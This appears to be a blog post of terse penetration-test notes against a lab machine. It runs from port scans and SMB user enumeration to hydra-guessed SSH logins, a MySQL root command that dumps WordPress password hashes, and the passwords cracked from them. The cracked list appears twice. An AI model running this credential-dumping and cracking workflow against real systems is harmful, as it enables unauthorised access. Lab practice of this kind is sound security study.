192.168.1.94
nmap:
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain dnsmasq 2.75
80/tcp open http PHP cli server 5.5 or later
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
maybe ubuntu 16.04
ftp anonymous login:
Harry, make sure to update the banner when you get a chance to show who has access here
cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
nikto -host 192.168.1.94:
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
nikto -host 192.168.1.94 -port 12380 -ssl:
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ /phpmyadmin/: phpMyAdmin directory found
gobuster dir -k -u https://192.168.1.94:12380 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s “200,301,302” -t 4:
/announcements (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/robots.txt (Status: 200)
enum4linux:
[+] Attempting to map shares on 192.168.1.94
//192.168.1.94/print$ Mapping: DENIED, Listing: N/A
//192.168.1.94/kathy Mapping: OK, Listing: OK
//192.168.1.94/tmp Mapping: OK, Listing: OK
//192.168.1.94/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
smbclient //192.168.1.94/kathy -N
wordpress 4.2.1
hydra:
username SHayslett, password SHayslett
username Drew, password qwerty
ssh:
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
mysql -uroot -pplbkac -sN -e “SELECT user_login, user_pass FROM wordpress.wp_users”
John $P$B7889EMq/erHIuZapMB8GEizebcIy9.
Elly $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
Peter $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
barry $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
heather $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
garry $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
harry $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
scott $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
kathy $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
tim $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
ZOE $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
Dave $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
Simon $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
Abby $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
Vicki $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
Pam $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0
john-the-ripper:
garry:football harry:monkey scott:cookie kathy:coolgirl barry:washere John:incorrect tim:thumb Pam:0520 heather:passphrase Dave:damachine Elly:ylle ZOE:partyqueen wordpress login username John, password incorrect
garry:football harry:monkey scott:cookie kathy:coolgirl barry:washere John:incorrect tim:thumb Pam:0520 heather:passphrase Dave:damachine Elly:ylle ZOE:partyqueen wordpress login username John, password incorrect
No comments:
Post a Comment